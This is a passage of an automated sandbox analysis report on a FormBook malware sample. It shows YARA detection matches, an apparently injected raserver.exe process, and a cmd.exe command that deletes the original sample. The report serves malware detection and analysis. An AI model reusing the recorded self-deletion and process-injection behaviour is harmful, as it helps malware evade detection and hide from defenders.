                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 6076

                                        General

                                        Start time:08:57:18
                                        Start date:12/06/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff6fee60000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: raserver.exe PID: 6340 Parent PID: 3424

                                        General

                                        Start time:08:57:38
                                        Start date:12/06/2021
                                        Path:C:\Windows\SysWOW64\raserver.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\raserver.exe
                                        Imagebase:0x1370000
                                        File size:108544 bytes
                                        MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Analysis Process: cmd.exe PID: 3416 Parent PID: 6340

                                        General

                                        Start time:08:57:42
                                        Start date:12/06/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: conhost.exe PID: 2216 Parent PID: 3416

                                        General

                                        Start time:08:57:43
                                        Start date:12/06/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >